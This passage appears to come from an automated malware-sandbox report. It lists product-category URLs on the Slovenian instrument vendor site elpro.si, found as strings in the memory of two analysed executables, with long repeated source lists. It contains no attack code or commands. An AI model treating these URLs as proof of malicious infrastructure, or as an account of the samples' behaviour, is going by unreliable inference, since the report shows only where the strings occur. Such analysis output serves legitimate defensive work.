00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/rotronic-merilniki-diferencialnega-tlaka/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/sistemi-tlacnih-vmesnikov/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacna-stikala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/ventili-in-zascitne-naprave-za-merilnike-tla
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/comet-vlaga-dew-point-monitoring-kalibracija
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/michell-instruments-dew-point-merilniki-tock
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/prenosni-merilniki-vlage-temperature-in-atmo
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/obnove-in-posodobitve-strojev-in-naprav/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/precizna-temperaturna-tipala/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/vecih-plinov/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-30-eu/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/
